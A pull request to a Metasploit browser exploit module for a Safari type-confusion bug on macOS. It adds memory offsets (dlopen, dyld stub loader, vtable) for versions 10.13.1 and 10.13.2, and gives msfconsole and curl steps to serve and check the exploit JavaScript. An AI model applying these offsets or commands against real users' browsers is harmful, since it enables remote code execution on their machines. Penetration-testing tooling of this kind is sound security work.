### PR TITLE
add 10.13.1 and 10.13.2 offsets for the safari_proxy_object_type_confusion module

### DIFF
--- a/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb
+++ b/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb
@@ -50,45 +50,45 @@ class MetasploitModule < Msf::Exploit::Remote
   def offset_table
     {
       '10.12.6' => {
-        :jsc_vtab => '0x0000d8d8',
-        :dyld_stub_loader => '0x00001168',
-        :dlopen => '0x000027f7',
-        :confstr => '0x00002c84',
-        :strlen => '0x00001b40',
-        :strlen_got => '0xdc0',
+        jsc_vtab: '0x0000d8d8',
+        dyld_stub_loader: '0x00001168',
+        dlopen: '0x000027f7',
+        confstr: '0x00002c84',
+        strlen: '0x00001b40',
+        strlen_got: '0xdc0'
       },
       '10.13' => {
-        :jsc_vtab => '0x0000e5f8',
-        :dyld_stub_loader => '0x000012a8',
-        :dlopen => '0x00002e60',
-        :confstr => '0x000024fc',
-        :strlen => '0x00001440',
-        :strlen_got => '0xee8',
+        jsc_vtab: '0x0000e5f8',
+        dyld_stub_loader: '0x000012a8',
+        dlopen: '0x00002e60',
+        confstr: '0x000024fc',
+        strlen: '0x00001440',
+        strlen_got: '0xee8'
       },
       '10.13.1' => {
-        :jsc_vtab => '0x0000e5f8',
-        :dyld_stub_loader => '0x000012a8',
-        :dlopen => '0x00002e60',
-        :confstr => '0x000024dc',
-        :strlen => '0x00001420',
-        :strlen_got => '0xee8',
+        jsc_vtab: '0x0000e5f8',
+        dyld_stub_loader: '0x000012a8',
+        dlopen: '0x00002e60',
+        confstr: '0x000024dc',
+        strlen: '0x00001420',
+        strlen_got: '0xee8'
       },
-       '10.13.2' => {
-        :jsc_vtab => '0x0000e5e8',
-        :dyld_stub_loader => '0x00001278',
-        :dlopen => '0x00002e30',
-        :confstr => '0x000024dc',
-        :strlen => '0x00001420',
-        :strlen_got => '0xee0',
+      '10.13.2' => {
+        jsc_vtab: '0x0000e5e8',
+        dyld_stub_loader: '0x00001278',
+        dlopen: '0x00002e30',
+        confstr: '0x000024dc',
+        strlen: '0x00001420',
+        strlen_got: '0xee0'
       },
       '10.13.3' => {
-        :jsc_vtab => '0xe5e8',
-        :dyld_stub_loader => '0x1278',
-        :dlopen => '0x2e30',
-        :confstr => '0x24dc',
-        :strlen => '0x1420',
-        :strlen_got => '0xee0',
-      },
+        jsc_vtab: '0xe5e8',
+        dyld_stub_loader: '0x1278',
+        dlopen: '0x2e30',
+        confstr: '0x24dc',
+        strlen: '0x1420',
+        strlen_got: '0xee0'
+      }
     }
   end
 

--- a/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb
+++ b/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb
@@ -65,6 +65,22 @@ class MetasploitModule < Msf::Exploit::Remote
         :strlen => '0x00001440',
         :strlen_got => '0xee8',
       },
+      '10.13.1' => {
+        :jsc_vtab => '0x0000e5f8',
+        :dyld_stub_loader => '0x000012a8',
+        :dlopen => '0x00002e60',
+        :confstr => '0x000024dc',
+        :strlen => '0x00001420',
+        :strlen_got => '0xee8',
+      },
+       '10.13.2' => {
+        :jsc_vtab => '0x0000e5e8',
+        :dyld_stub_loader => '0x00001278',
+        :dlopen => '0x00002e30',
+        :confstr => '0x000024dc',
+        :strlen => '0x00001420',
+        :strlen_got => '0xee0',
+      },
       '10.13.3' => {
         :jsc_vtab => '0xe5e8',
         :dyld_stub_loader => '0x1278',


### PR DESCRIPTION
This pull request adds some missing offsets for 10.13.1 and 10.13.2. This are from @cndycc (thanks!!!)
I haven't tested them, and it might be fiddly to get an environment for this, so I suggest just testing whether the module loads and returns javascript rather than testing the actual exploit.

Maybe @cndycc can show us the results from his testing.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole` and run the module: 
```
use exploit/osx/browser/safari_proxy_object_type_confusion
set SRVHOST 127.0.0.1
set URIPATH /test
set LHOST 127.0.0.1
run
```
- [ ] Use curl to imitate the user agent: `curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/10.0.1 Safari/601.2.7" http://127.0.0.1:8080/test`
- [ ] **Verify** you get javascript back from the server
